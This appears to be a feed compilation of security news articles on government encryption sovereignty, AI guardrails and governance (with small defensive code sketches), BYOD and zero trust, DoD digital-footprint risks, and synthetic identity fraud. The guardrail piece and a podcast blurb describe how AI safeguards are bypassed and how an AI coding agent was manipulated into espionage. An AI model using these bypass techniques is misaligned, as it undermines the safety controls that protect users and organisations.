End-to-end encryption is next frontline in governments’ data sovereignty war with hyperscalers

Data residency is no longer enough. As governments lose faith that storing data within their borders, but on someone else’s servers, provides real sovereignty, regulators are demanding something more fundamental: control over the encryption keys for their data.

Privatim, a collective of Swiss local government data protection officers, last week called on their employers to avoid the use of international software-as-a-service solutions for sensitive government data unless the agencies themselves implement end-to-end encryption. The resolution specifically cited Microsoft 365 as an example of the kinds of platforms that fall short.

“Most SaaS solutions do not yet offer true end-to-end encryption that would prevent the provider from accessing plaintext data,” said the Swiss data protection officers’ resolution. “The use of SaaS applications therefore entails a significant loss of control.”

Security analysts say this loss of control undermines the very concept of data sovereignty. “When a cloud provider has any ability to decrypt customer data, either through legal process or internal mechanisms, the data is no longer truly sovereign,” said Sanchit Vir Gogia, chief analyst at Greyhound Research.

The Swiss position isn’t isolated, Gogia said. Across Europe, Germany, France, Denmark and the European Commission have each issued warnings or taken action, pointing to a loss of faith in the neutrality of foreign-owned hyperscalers, he said. “Switzerland distinguished itself by stating explicitly what others have implied: that the US CLOUD Act and foreign surveillance risk renders cloud solutions lacking end-to-end encryption unsuitable for high-sensitivity public sector use, according to the resolution.”

Encryption, location, location

Privatim’s resolution identified risks that geographic data residency cannot address. Globally operating companies offer insufficient transparency for authorities to verify compliance with contractual obligations, the group said. This opacity extends to technical implementations, change management, and monitoring of employees and subcontractors who can form long chains of external service providers.

Data stored in one jurisdiction can still be accessed by foreign governments under extraterritorial laws like the US Clarifying Lawful Overseas Use of Data (CLOUD) Act, said Ashish Banerjee, senior principal analyst at Gartner. Software providers can also unilaterally amend contract terms periodically, further reducing customer control, he said.

“Several clients in the Middle East and Europe have raised concerns that, regardless of where their data is stored, it could still be accessed by cloud providers — most of which are US-based,” Banerjee said.

Prabhjyot Kaur, senior analyst at Everest Group, said the Swiss stance accelerates a broader regulatory pivot toward technical sovereignty controls. “While the Swiss position is more stringent than most, it is not an isolated outlier,” she said. “It accelerates a broader regulatory pivot toward technical sovereignty controls, even in markets that still rely on contractual or procedural safeguards today.”

Given these limitations, Privatim called for stricter rules on cloud use at all levels of government: “The use of international SaaS solutions for particularly sensitive personal data or data subject to legal confidentiality obligations by public bodies is only possible if the data is encrypted by the responsible body itself and the cloud provider has no access to the key.”

This represents a departure from current practices, where many government bodies rely on cloud providers’ native encryption features. Services like Microsoft 365 offer encryption at rest and in transit, but Microsoft retains the ability to decrypt that data for operational purposes, compliance requirements, or legal requests.
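
To make that distinction concrete, here is a minimal Python sketch (using the open-source cryptography package) of the customer-held-key pattern Privatim describes: the agency generates and keeps the key, encrypts locally, and uploads only ciphertext. The upload_to_saas function is a hypothetical stand-in, not any vendor's API.

# Minimal sketch of agency-side ("customer-held key") encryption.
# Requires: pip install cryptography. Names are illustrative only.
from cryptography.fernet import Fernet

def upload_to_saas(blob: bytes) -> None:
    """Hypothetical stand-in for a SaaS upload call."""
    print(f"uploaded {len(blob)} opaque bytes")

# 1. The key is generated and stored in the agency's own key
#    management system; the cloud provider never receives it.
agency_key = Fernet.generate_key()
cipher = Fernet(agency_key)

# 2. Encrypt before anything leaves the agency's perimeter.
document = b"Sensitive case file contents"
ciphertext = cipher.encrypt(document)

# 3. Only ciphertext reaches the provider. A provider compelled to
#    disclose stored data can hand over nothing but opaque bytes.
upload_to_saas(ciphertext)

# 4. Decryption is only possible where the key lives.
assert cipher.decrypt(ciphertext) == document

By contrast, with provider-managed encryption at rest, the provider can perform that same decrypt step itself because it holds or can access the key, which is precisely the capability Privatim's resolution rules out.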

More security, less insight

Customer-controlled end-to-end encryption comes with significant trade-offs, analysts said.

“When the provider has zero visibility into plaintext, governments would face reduced search and indexing capabilities, limited collaboration features, and restrictions on automated threat detection and data loss prevention tooling,” said Kaur. “AI-driven productivity enhancements like copilots also rely on provider-side processing, which becomes impossible under strict end-to-end encryption.”

Beyond functionality losses, agencies would face significant infrastructure and cost challenges. They would need to operate their own key management systems, introducing governance overhead and staffing needs. Encryption and decryption at scale can impact system performance, as they require additional hardware resources and increase latency, Banerjee said.

“This might require additional hardware resources, increased latency in user interactions, and a more expensive overall solution,” he said.

These constraints mean most governments will likely adopt a tiered approach rather than blanket encryption, said Gogia. “Highly confidential content, including classified documents, legal investigations, and state security dossiers, can be wrapped in true end-to-end encryption and segregated into specialized tenants or sovereign environments,” he said. Broader government operations, including administrative records and citizen services, will continue to use mainstream cloud platforms with controlled encryption and enhanced auditability.

A shift in cloud computing power

If the Swiss approach gains momentum internationally, hyperscalers will need to strengthen technical sovereignty controls rather than relying primarily on contractual or regional assurances, Kaur said. “The required adaptations are already visible, particularly from Microsoft, which has begun rolling out more stringent models around customer-controlled encryption and jurisdictional access restrictions.”

The shift challenges fundamental assumptions in how cloud providers have approached government customers, according to Gogia. “This invalidates large portions of the existing government cloud playbooks that depend on data center residency, regional support, and contractual segmentation as the primary guarantees,” he said. “Client-side encryption, confidential computing, and external key management are no longer optional capabilities but baseline requirements for public sector contracts in high-compliance markets.”

The market dynamics could shift significantly as a result. Banerjee said this could create a two-tier structure: global cloud services for commercial customers less concerned about sovereignty, and premium sovereign clouds for governments demanding full control. “Non-US cloud providers and local vendors — such as emerging players in Europe — could gain market share by delivering sovereign solutions that meet strict encryption requirements,” he said.

Privatim’s recommendations apply specifically to Swiss public bodies and serve as guidance rather than binding policy. But the debate signals that data location alone may no longer satisfy regulators’ sovereignty concerns in an era where geopolitical rivalries are increasingly playing out through technology policy.

Guardrails and governance: A CIO’s blueprint for responsible generative and agentic AI

The promise of generative AI (genAI) and agentic AI is electrifying. From automating complex tasks to unlocking unprecedented creativity, these technologies are poised to redefine your enterprise landscape. But as a CIO, you know that with great power comes great responsibility — and significant risk. The headlines are already filled with cautionary tales of data breaches, biased outputs and compliance nightmares.

The truth is, without robust guardrails and a clear governance framework, the very innovations you champion could become your biggest liabilities. This isn’t about stifling innovation; it’s about channeling it responsibly, ensuring your AI initiatives drive value without compromising security, ethics or trust.

Let’s dive into the critical areas where you must lead the charge.

Guardrails & governance: Why they are necessary, but no longer sufficient for agents

Many in the industry confuse the function of guardrails, treating them as a flimsy substitute for true oversight. This is a critical misconception that must be addressed. Guardrails and governance are not interchangeable; they are two essential parts of a single system of control.

Think of it this way:

  • AI governance is the blueprint and the organization. It’s the framework of policies, roles, committees (like your AI review board) and processes that define what is acceptable, who is accountable and how you will monitor and audit all AI systems across the enterprise. Governance is the strategy and the chain of command.
  • AI guardrails are the physical controls and the rules in the code. These are the technical mechanisms embedded directly into the AI system’s architecture, APIs and interfaces to enforce the governance policies in real-time. Guardrails are the enforcement layer.

While we must distinguish between governance (the overarching policy framework) and guardrails (technical, in-the-moment controls), the reality of agentic AI has revealed a critical flaw: current soft guardrails are failing catastrophically. These controls are often probabilistic, pattern-based or rely on LLM self-evaluation, which is easily bypassed by an agent’s core capabilities: autonomy and composability (the ability to chain tools and models).

Guardrail failure mode  | Core flaw                                    | CIO takeaway: Why static fails
PII/Moderation          | Pattern reliance & shallow filters           | Fails when sensitive data is slightly obfuscated (e.g., using "SNN" instead of "SSN") or harmful content is wrapped in code/leetspeak.
Hallucination/Jailbreak | Circular confidence & probabilistic defense  | Relies on one model to judge another's truthfulness or intent. The defense is easily manipulated, as the system can be confidently wrong or tricked by multi-turn or encoded attacks.

The agent’s ability to choose an alternate, unguarded path renders simple static checks useless. Your imperative is to move from relying on these flawed, soft defenses to implementing continuous, deterministic control.

The path forward: Implementing continuous control

To address these systemic vulnerabilities, CIOs must take the following actions:

  1. Mandate hard data boundaries: Replace the agent’s probabilistic PII detection with deterministic, non-LLM-based security tools (DLP, tokenization) enforced by your API gateway. This creates an un-bypassable security layer for all data entering or leaving the agent (see the tokenization sketch after this list).
  2. Shift to pre-execution governance: Require all agentic deployments to utilize an agent orchestration layer that performs a pre-execution risk assessment on every tool call and decision step. This continuous governance module checks the agent’s compliance before it executes a financial transaction or high-privilege API call.
  3. Ensure forensic traceability: Implement a “Digital Ledger” approach for all agent actions. Every LLM call, parameter passed and reasoning step must be logged sequentially and immutably to allow for forensic reconstruction and accountability.
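
A hedged sketch of action 1 above: rather than asking a model whether text contains PII, a deterministic gateway tokenizes every SSN-shaped digit sequence before the payload reaches or leaves the agent. Names and patterns are illustrative; a real deployment would sit behind a DLP product or a vault-backed tokenization service.

import re
import secrets

# token -> original value, held inside the trusted boundary
TOKEN_VAULT: dict[str, str] = {}

# Keys on the shape of the data, not on labels a user can obfuscate.
SSN_SHAPE = re.compile(r"\b\d{3}[-\s]?\d{2}[-\s]?\d{4}\b")

def tokenize_pii(payload: str) -> str:
    """Deterministically replace SSN-shaped values with opaque tokens."""
    def swap(match: re.Match) -> str:
        token = f"<PII:{secrets.token_hex(4)}>"
        TOKEN_VAULT[token] = match.group(0)
        return token
    return SSN_SHAPE.sub(swap, payload)

msg = "Applicant SNN: 078-05-1120 requests a records check."
print(tokenize_pii(msg))
# -> Applicant SNN: <PII:...> requests a records check.
# The mislabeled "SNN" no longer matters: this filter never consults
# the label, so the obfuscation that defeated the soft guardrail
# shown earlier has no effect here.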

Data security: Your ‘private-by-default’ AI strategy

The fear of proprietary data leaking into public models is palpable, and for good reason. Every piece of intellectual property inadvertently fed into a large language model (LLM) becomes a potential competitive disadvantage. This is where a “private-by-default” strategy becomes non-negotiable for your organization, a necessity widely discussed by KPMG in analyses such as The new rules of data governance in the age of generative AI.

This means you need to consider:

  • Embracing private foundation models: For highly sensitive workloads, investing in or leveraging private foundation models hosted within your secure environment is paramount. This gives you ultimate control over the model, its training data and its outputs.
  • Leveraging retrieval augmented generation (RAG) architectures: RAG is a game-changer. Instead of training a model directly on your entire private dataset, RAG systems allow the AI to retrieve relevant information from your secure, internal knowledge bases and then use a public or private LLM to generate a response. This keeps your sensitive data isolated while still providing contextually rich answers (a minimal sketch follows this list).
  • Robust data anonymization and masking: For any data that must interact with external models, implement stringent anonymization and masking techniques. This minimizes the risk of personally identifiable information (PII) or sensitive business data being exposed.
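
A minimal sketch of the RAG pattern, under stated assumptions: the knowledge base stays inside your environment, retrieval here is a toy word-overlap score (real systems use vector embeddings and an approximate-nearest-neighbor index), and call_llm is a hypothetical stand-in for whatever private or public model endpoint you use.

from collections import Counter

# Internal knowledge base: never used to train the model.
KNOWLEDGE_BASE = [
    "Policy 12.3: Contractor badges must be renewed every 180 days.",
    "Policy 7.1: Travel above $5,000 requires director approval.",
]

def score(query: str, doc: str) -> int:
    """Toy lexical relevance: count overlapping words."""
    q, d = Counter(query.lower().split()), Counter(doc.lower().split())
    return sum((q & d).values())

def retrieve(query: str) -> str:
    """Fetch the most relevant snippet from the secure store."""
    return max(KNOWLEDGE_BASE, key=lambda doc: score(query, doc))

def call_llm(prompt: str) -> str:
    """Hypothetical stand-in for a model endpoint."""
    return f"[answer grounded only in the supplied context: {prompt[:50]}...]"

question = "How often must contractor badges be renewed?"
context = retrieve(question)  # only this snippet leaves the store
print(call_llm(f"Using only this context:\n{context}\n\nQ: {question}"))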

Your goal isn’t just to prevent data leakage; it’s to build a resilient AI ecosystem that protects your most valuable assets from the ground up.

Explainability & auditability: The imperative for agentic AI

Generative AI creates; agentic AI acts. When an autonomous AI agent is making decisions, executing transactions or interacting with customers, the stakes escalate dramatically. Regulators, auditors and even internal stakeholders will demand to know why an agent took a particular action.

This necessitates a forensic level of explainability and auditability:

  • Comprehensive decision logging: Every single decision, every parameter change, every data point considered by an AI agent must be meticulously logged. This isn’t just about output; it’s about the entire chain of reasoning.
  • Clear audit trails: These logs must be easily accessible, searchable and structured to form a clear, human-readable audit trail. When an auditor asks how an AI agent processed a loan application, you should be able to trace every step, from input to final decision.
    • Agentic AI example: An agent is tasked with automating supplier payments. A key guardrail must be a transaction limit filter that automatically holds any payment over $100,000 for human approval. The corresponding governance policy requires that the log for that agent details the entire sequence of API calls, the exact rule that triggered the hold and the human who provided the override, creating a perfect audit trail (sketched in code after this list).
  • Transparency in agent design: The design and configuration of your AI agents should be documented and version-controlled. Understanding the rules, logic and external integrations an agent uses is crucial for diagnosing issues and ensuring compliance.
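
The supplier-payment example above might look like the following sketch (all names, limits and the hash-chained log format are assumptions for illustration): the limit filter is enforced deterministically in code, and every decision is appended to a tamper-evident log an auditor can replay.

import hashlib
import json
import time
from typing import Optional

PAYMENT_LIMIT = 100_000
AUDIT_LOG: list = []  # append-only; each entry chains the previous hash

def log_event(event: dict) -> None:
    """Append a hash-chained entry so tampering is detectable."""
    prev = AUDIT_LOG[-1]["hash"] if AUDIT_LOG else "genesis"
    body = json.dumps({**event, "prev": prev}, sort_keys=True)
    AUDIT_LOG.append({**event, "prev": prev,
                      "hash": hashlib.sha256(body.encode()).hexdigest()})

def pay_supplier(amount: int, approver: Optional[str] = None) -> str:
    """Guardrail: payments over the limit are held for a human."""
    if amount > PAYMENT_LIMIT and approver is None:
        log_event({"ts": time.time(), "action": "payment_held",
                   "amount": amount, "rule": f"amount > {PAYMENT_LIMIT}"})
        return "HELD_FOR_HUMAN_APPROVAL"
    log_event({"ts": time.time(), "action": "payment_executed",
               "amount": amount, "approver": approver})
    return "EXECUTED"

print(pay_supplier(250_000))                   # held: the rule fired
print(pay_supplier(250_000, approver="jdoe"))  # executed: override logged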

Ethical oversight: Nurturing responsible AI

Beyond security and compliance lies the profound ethical dimension of AI. Addressing this requires a proactive, human-centric approach:

  • Establish an AI review board or center of excellence (CoE): This isn’t a suggestion; it’s a necessity. This multidisciplinary group, comprising representatives from legal, ethics, data science and business units, should be the conscience of your AI strategy, aligning with guidance found in resources like The CIO’s guide to AI governance. Their mandate is to:
    • Proactive bias detection: Scrutinize model training data for potential biases before deployment.
    • Fairness in agent design: Review the logic and rules governing AI agents to ensure they don’t inadvertently discriminate or produce unfair results.
    • Ethical guidelines & policies: Develop and enforce clear ethical guidelines for the use and deployment of all AI within the organization.
    • Ethical AI example: A new genAI model is deployed to screen job candidates. A technical guardrail is implemented as an output toxicity filter to block any language the model suggests that could be interpreted as discriminatory. The governance policy dictates that the AI review board must regularly audit the model’s screening outcomes to ensure the overall hiring rate for protected groups remains statistically unbiased.
  • Human-in-the-loop mechanisms: For critical AI-driven decisions, ensure there’s always an opportunity for human review and override.
  • Bias mitigation techniques: Invest in techniques like re-weighting training data and Explainable AI (XAI) tools to understand and reduce bias in your models.

Responsible AI isn’t a checkbox; it’s a continuous journey of introspection, vigilance and commitment.

The CIO’s leadership imperative

The deployment of genAI and agentic AI isn’t just an IT project; it’s a strategic transformation that touches every facet of the enterprise. As the CIO, you are uniquely positioned to lead this charge, not just as a technologist, but as a strategist, risk manager and ethical guardian.

By prioritizing a “private-by-default” data strategy, enforcing rigorous explainability and auditability for autonomous agents and establishing robust ethical oversight, you can unlock the full potential of AI while building an enterprise that is secure, compliant and profoundly responsible. The future of AI is bright, but only if you build it on a foundation of trust and accountability. Make sure your blueprints reflect that.

This article is published as part of the Foundry Expert Contributor Network.

AI Agent Does the Hacking: First Documented AI-Orchestrated Cyber Espionage

By: Tom Eston

In this episode, we discuss the first reported AI-driven cyber espionage campaign, as disclosed by Anthropic. In September 2025, a state-sponsored Chinese actor manipulated the Claude Code tool to target 30 global organizations. We explain how the attack was executed, why it matters, and its implications for cybersecurity. Join the conversation as we examine the […]

The post AI Agent Does the Hacking: First Documented AI-Orchestrated Cyber Espionage appeared first on Shared Security Podcast.



Personal Devices at Work and the Future of How We Work: The Light and Shadow of BYOD

The hybrid-work era and the surge of "invisible IT assets"

Using your own smartphone or PC for work (BYOD) is no longer an unusual way of working. Global survey data suggest that nearly half of employees already use personal devices for work in some form, and the market continues to grow at a remarkable rate of around 15 percent per year. Some forecasts put it at hundreds of billions of dollars by the early 2030s, and the trend is widely expected to accelerate further.

What is striking is that while only about half of companies officially sanction BYOD, in practice employees use personal devices for work at more than 80 percent of companies. In other words, at many organizations de facto BYOD spread on the ground before internal rules could be put in place. The gap also shows up in survey results: roughly 80 percent of employees say they would prefer to keep separate devices for work and personal use, yet only about 15 percent are actually issued a device by their employer. This gap between ideal and reality is fueling BYOD's rapid spread.

This situation has given rise to the problem known as "shadow IT." Personal devices, consumer cloud services and chat apps used outside the IT department's oversight are proliferating, and IT assets the company cannot account for are surging. One recent survey reported the startling finding that roughly 40 percent of cloud applications in enterprise use are shadow IT unknown to the IT department. The spread of BYOD enlarges these blind spots and significantly weakens corporate IT governance.

The cost benefits are also hard to ignore. One estimate puts the savings from a mobile BYOD program at more than $300 per employee per year. Because it cuts not only procurement costs but also management and maintenance expenses, BYOD is an attractive option especially for small and midsize businesses. Employees, for their part, often report higher productivity and satisfaction from working on devices they already know.

Worsening security risks and the shift to zero trust

Behind BYOD's convenience, security risks are worsening rapidly. In multiple surveys, around 60 percent of IT leaders name security as their biggest BYOD concern, and malware infections and data leaks originating from unmanaged devices keep occurring. Most striking is the report that more than 90 percent of ransomware incidents originate from an unmanaged device. Devices the organization cannot see have become its greatest weakness.

Against this backdrop, the debate over whether to ban BYOD or tighten its rules has reignited worldwide. In the UK, one survey found that more than half of companies are considering banning personal devices in the office, and a major telecom operator has recommended switching from BYOD to fully company-managed devices. Realistically, however, abandoning flexible work entirely is difficult, given business speed and the need to attract talent.

This is where BYOD redesigned around zero-trust thinking is drawing attention. Zero trust abandons traditional assumptions such as "the corporate network is safe" or "a company PC can be trusted" and instead continuously verifies every access, regardless of who owns the device or where it is. On this basis, investment is surging in mobile device management (MDM), unified endpoint management (UEM) and AI-assisted endpoint security.

As a concrete technical approach, rather than managing the entire device, companies are increasingly containerizing only virtual desktops, secure browsers and business applications, logically separating corporate data from personal data. This shifts the emphasis from the device itself to user identity, access rights and per-application data protection. It also eases employees' psychological resistance to having their personal property inspected in detail, making it a more realistic and acceptable security measure.

Managing third-party access has also become an important theme. Contractors, freelancers and business partners increasingly access corporate cloud environments from their own devices, and managing that access is a major challenge. Trend reports for 2025 list "BYOD management including third-party access" among the top priorities, calling for comprehensive security that extends beyond the corporate perimeter.

Designing a "new BYOD" for sustainable ways of working

Looking at the global debate, a clear direction emerges for how companies should approach BYOD: the era of letting BYOD drift along is over, and it is time to migrate to a redesigned "new BYOD." This new BYOD is a more refined approach that carefully balances security with privacy, and convenience with manageability.

The first priority is migrating to unified endpoint management (UEM). UEM, which manages smartphones, tablets, laptops and even wearables and IoT devices under one roof, is a fast-growing field expanding alongside BYOD. Recent market research predicts that while MDM retains a large share, UEM will post the highest growth rate. UEM makes it possible to apply consistent security policies regardless of device type or ownership.

Next is the shift to "data-side defense" using virtualization and container technology. Rather than placing the device fully under company control, the design isolates only the applications or workspace and keeps corporate data off local storage. If a device is lost or stolen, only the work environment needs to be disabled remotely, which also makes it easier to respect personal privacy.

Updating policy and training is also indispensable. Many companies have no BYOD policy that anticipates modern usage such as off-hours use, device sharing with family members or automatic backups to personal cloud storage. And as generative AI tools spread, the risk of feeding confidential information into AI services from personal devices can no longer be ignored. Recent commentary stresses the need to redesign BYOD policy not as a mere list of device rules but as a behavioral guide for protecting identity and data, and to embed it through dialogue with employees.

Interestingly, BYOD is also starting to be discussed in an environmental and sustainability context. Global e-waste reached roughly 60 million tonnes as of 2023, and companies' continual mass procurement of new devices is a significant environmental burden. BYOD, by extending device life cycles and reducing procurement volumes, is cited as one way to lower that burden. For companies pursuing sustainable management, BYOD is taking on new meaning.

When Japanese companies introduce or review BYOD going forward, the key is not a binary "ban or allow" decision but a fine-grained design of what is allowed, to what extent and for whom. Highly confidential systems might require company-issued devices and virtual desktops, while general cloud groupware and chat could be opened to BYOD access; this kind of careful line-drawing is what is needed.

Investment is also essential in mechanisms that watch "access and data flows" rather than "the device." Adopting UEM, zero-trust principles and identity-based access control makes it possible to guarantee a consistent security level regardless of whether a device is BYOD. Above all, communication with employees matters. BYOD is not merely an IT-efficiency question; it touches deeply personal concerns such as how far the company may manage one's own phone and how work and private life are separated. Incorporating frontline voices from the policy-drafting stage, and carefully explaining the purpose, the risks and exactly what device information the company will access, is indispensable to BYOD that works in practice.

BYOD may look like a binary choice between "convenient" and "dangerous," but it is really a design problem: how to combine rules and technology. Whether companies can combine zero trust, UEM, virtualization and privacy-conscious policy into a BYOD that is comfortable for employees and safe for the company will be a key theme over the next several years. As the diversification of work styles becomes irreversible, BYOD is both an unavoidable challenge and a significant factor in corporate competitiveness.

DoD failing to address growing security threats posed by publicly available data

A government watchdog is sounding the alarm about a growing national security threat online. Rather than a traditional cyberattack, however, this one comes from the everyday digital footprints service members and their families leave across the internet. 

A new Government Accountability Office report warns that publicly accessible data — from social media posts and location tracking to Defense Department press releases — can be pieced together by malicious actors to identify military personnel, target their families and disrupt military operations.

According to GAO, while the Pentagon has taken some steps to address the threat, its efforts remain scattered, inconsistent and lack coordination. 

“We found that the department recognized that there were security issues, but they weren’t necessarily well-prepared to respond to them because it was new, because it didn’t necessarily neatly fit into existing organizational structures or policies or doctrines, and that’s a consistent story with the department,” Joe Kirschbaum, director of the defense capabilities and management team at GAO, told Federal News Network. 

To understand the risks posed to DoD personnel and operations that come from the aggregation of publicly accessible digital data, the watchdog conducted its own investigation and built notional threat scenarios showing how that information could be exploited. GAO began by surveying the types of data already available online and also assigned investigators to scour the dark web for information about service members. 

In addition to basic social media posts, investigators found data brokers selling personal and even operational information about DoD personnel and their families — information that can be combined with other publicly available data to build a more complete profile. 

“Once you start putting some of these things together, potentially, you start to see a pattern — whether it’s looking at individuals, whether it’s the individuals linked to military operational units or operations themselves, family members. Nefarious actors can take these things and build them into a profile that could be used for nefarious purposes,” Kirschbaum said. 

One of GAO’s threat scenarios shows how publicly accessible information can expose sensitive military training materials and capabilities. Investigators found that social media posts, online forums and dark-web marketplaces contained everything from military equipment manuals and detailed training materials to photos of facility and aircraft interiors. When combined, these digital footprints can reveal information about equipment modifications, strategic partnerships or potential vulnerabilities, which can be used to clone products, exploit weaknesses or undermine military operations.

And while DoD has identified the public accessibility of digital data as a “real and growing threat,” GAO found that DoD’s policies and guidance are narrowly focused on social media and email use rather than the full range of potential risks from aggregated digital footprints. 

For instance, the DoD chief information officer has prohibited the use of personal email or messaging apps for official business involving controlled unclassified information. But that policy doesn’t address the use of personal accounts on personal devices for unofficial tasks involving unclassified information — such as booking travel, accessing military travel orders, or posting on social media — activities that can pose similar risks once aggregated.

In addition, DoD officials acknowledged that current policies and guidance do not fully address the range of risks created by publicly accessible digital information about DoD and its personnel. They said part of the challenge is that the department has limited authority to regulate actions of DoD personnel and contractors outside of an operational environment.

“In general, except for the operation security folks, the answer was they didn’t really consider this kind of publicly available information in their own sphere. It’s not like they didn’t recognize there’s an issue, but it was more like, ‘Oh yeah, that’s a problem. But I think it’s handled in these other areas.’ Almost like passing the buck. They didn’t understand, necessarily, where it was handled. And the answer was, it should probably be handled collectively amidst this entire structure,” Kirschbaum said. 

The officials also said that while they had planned to review current policies and guidance, they “had not collaborated to address digital profile risks because they did not believe the digital profile threat and its associated risks aligned with the Secretary of Defense’s priorities,” including reviving warrior ethos, restoring trust in the military and reestablishing deterrence by defending the homeland. 

“One of our perspectives on this is we know we’re not sure where you would put this topic in terms of those priorities. I mean, this is a pretty clear case where it’s a threat to the stability and efficacy of our military forces. That kind of underlines all priorities — you can’t necessarily defend the homeland with forces that have maybe potential operational security weaknesses. So it would seem to kind of undergird all of those priorities,” Kirschbaum said. 

“We also respect the fact that as the department’s making tough choices, whether it’s concentrations of policy, financial and things of that nature, they do have to figure out the most immediate ways to apply dollars. For example, we’re asking the department to look across all those security disciplines and more thoroughly incorporate these threats in that existing process. The extent they’re going to have to make investments in those, they do have to figure out what needs to be done first and where this fits in,” he added.

GAO issued 12 recommendations to individual components and agency heads, but at its core, Kirschbaum said, is the need for the department to incorporate the threat of publicly available information into its existing structure. 

“In order to do that, we’re asking them to use those existing structures that they do have, like the security enterprise executive committee, as their collaborative mechanism. We want that body to really assess where the department is. And sometimes they’re better able to identify exactly what they need to do, rather than us telling them. We want them to identify what they need to do and conduct those efforts,” he said.

The post DoD failing to address growing security threats posed by publicly available data first appeared on Federal News Network.


A New Frontline: How Digital Identity Fraud Redefines National Security Threats



DEEP DIVE — From stolen military credentials to AI-generated personas seamlessly breaching critical infrastructure, digital identity fraud is rapidly escalating into a frontline national security threat. This sophisticated form of deception allows adversaries to bypass traditional defenses, making it an increasingly potent weapon.

The 2025 Identity Breach Report, published by AI-driven identity risk firm Constella Intelligence, reveals a staggering increase in the circulation of stolen credentials and synthetic identities. The findings warn that this invisible epidemic (so called because it is harder to detect than traditional malware and blends in with legitimate activity) is no longer just a commercial concern—it now poses a serious threat to U.S. national security.

“Identity verification is the foundation of virtually all security systems, digital and physical, and AI is making it easier than ever to undermine this process,” Mike Sexton, a Senior Policy Advisor for AI & Digital Technology at national think tank Third Way, tells The Cipher Brief. “AI makes it easier for attackers to simulate real voices or hack and steal private credentials at unprecedented scale. This is poised to exacerbate the cyberthreats the United States faces broadly, especially civilians, underscoring the danger of Donald Trump’s sweeping job cuts at the Cybersecurity and Infrastructure Security Agency.”

The Trump administration’s proposed Fiscal Year 2026 budget would eliminate 1,083 positions at CISA, reducing staffing by nearly 30 percent from roughly 3,732 roles to around 2,649.


The Industrialization of Identity Theft

The Constella report, based on analysis of 80 billion breached records from 2016 to 2024, highlights a growing reliance on synthetic identities—fake personas created from both real and fabricated data. Once limited to financial scams, these identities are now being used for far more dangerous purposes, including espionage, infrastructure sabotage, and disinformation campaigns.

State-backed actors and criminal groups are increasingly using identity fraud to bypass traditional cybersecurity defenses. In one case, hackers used stolen administrator credentials at an energy sector company to silently monitor internal communications for more than a year, mapping both its digital and physical operations.

“In 2024, identity moved further into the crosshairs of cybercriminal operations,” the report states. “From mass-scale infostealer infections to the recycling of decade-old credentials, attackers are industrializing identity compromise with unprecedented efficiency and reach. This year’s data exposes a machine-scale identity threat economy, where automation and near-zero cost tactics turn identities into the enterprise’s most targeted assets.”

Dave Chronister, CEO of Parameter Security and a prominent ethical hacker, links the rise in identity-based threats to broader social changes.

“Many companies operate with teams that have never met face-to-face. Business is conducted over LinkedIn, decisions authorized via messaging apps, and meetings are held on Zoom instead of in physical conference rooms,” he tells The Cipher Brief. “This has created an environment where identities are increasingly accepted at face value, and that’s exactly what adversaries are exploiting.”

When Identities Become Weapons

This threat isn’t hypothetical. In early July, a breach by the China-linked hacking group Volt Typhoon exposed Army National Guard network diagrams and administrative credentials. U.S. officials confirmed the hackers used stolen credentials and “living off the land” techniques—relying on legitimate admin tools to avoid detection.

In cybersecurity, “living off the land” means that attackers (like the China-linked hacking group Volt Typhoon) don’t bring their own malicious software or tools into a compromised network. Instead, they use the legitimate software, tools and functionality already present on the victim’s systems and network.

“It’s far more difficult to detect a fake worker or the misuse of legitimate credentials than to flag malware on a network,” Chronister explained.

Unlike traditional identity theft, which hijacks existing identities, synthetic identity fraud creates entirely new ones using a blend of real and fake data—such as Social Security numbers from minors or the deceased. These identities can be used to obtain official documents, government benefits, or even access secure networks while posing as real people.

“Insider threats, whether fully synthetic or stolen identities, are among the most dangerous types of attacks an organization can face, because they grant adversaries unfettered access to sensitive information and systems,” Chronister continued.

Insider threats involve attacks that come from individuals with legitimate access, such as employees or fake identities posing as trusted users, making them harder to detect and often more damaging.

Constella reports these identities are 20 times harder to detect than traditional fraud. Once established with a digital history, a synthetic identity can even appear more trustworthy than a real person with limited online presence.

“GenAI tools now enable foreign actors to communicate in pitch-perfect English while adopting realistic personas. Deepfake technology makes it possible to create convincing visual identities from just a single photo,” Chronister said. “When used together, these technologies blur the line between real and fake in ways that legacy security models were never designed to address.”

Washington Lags Behind

U.S. officials acknowledge that the country remains underprepared. Multiple recent hearings and reports from the Department of Homeland Security and the House Homeland Security Committee have flagged digital identity as a growing national security vulnerability—driven by threats from China, transnational cybercrime groups, and the rise of synthetic identities.

The committee has urged urgent reforms, including mandatory quarterly “identity hygiene” audits for organizations managing critical infrastructure, modernized authentication protocols, and stronger public-private intelligence sharing.

Meanwhile, the Defense Intelligence Agency’s 2025 Global Threat Assessment warns:

“Advanced technology is also enabling foreign intelligence services to target our personnel and activities in new ways. The rapid pace of innovation will only accelerate in the coming years, continually generating means for our adversaries to threaten U.S. interests.”

An intelligence official not authorized to speak publicly told The Cipher Brief that identity manipulation will increasingly serve as a primary attack vector to exploit political divisions, hijack supply chains, or infiltrate democratic processes.


Private Sector on the Frontline

For now, much of the responsibility falls on private companies—especially those in banking, healthcare, and energy. According to Constella, nearly one in three breaches last year targeted sectors classified as critical infrastructure.

“It's never easy to replace a core technology, particularly in critical infrastructure sectors. That’s why these systems often stay in place for many years if not decades,” said Chronister.

Experts warn that reacting to threats after they’ve occurred is no longer sufficient. Companies must adopt proactive defenses, including constant identity verification, behavioral analytics, and zero-trust models that treat every user as untrusted by default.

However, technical upgrades aren’t enough. Sexton argues the United States needs a national digital identity framework that moves beyond outdated systems like Social Security numbers and weak passwords.

“The adherence to best-in-class identity management solutions is critical. In practice for the private sector, this means relying on trusted third parties like Google, Meta, Apple, and others for identity verification,” he explained. “For the U.S. government, these are systems like REAL ID, ID.me, and Login.gov. We must also be mindful that heavy reliance on these identity hubs creates concentration risk, making their security a critical national security chokepoint.”

Building a National Identity Defense

Some progress is underway. The federal Login.gov platform is expanding its fraud prevention capabilities, with plans to incorporate Mobile Driver’s Licenses and biometric logins by early 2026. But implementation remains limited in scale, and many agencies still rely on outdated systems that don’t support basic protections like multi-factor authentication.

“I would like to see the US government further develop and scale solutions like Login.gov and ID.me and then interoperate with credit agencies and law enforcement to respond to identity theft in real time,” Sexton said. “While securing those systems will always be a moving target, users’ data is ultimately safer in the hands of a well-resourced public entity than in those of private firms already struggling to defend their infrastructure.”

John Dwyer, Deputy CTO of Binary Defense and former Head of Research at IBM X-Force, agreed that a unified national system is needed.

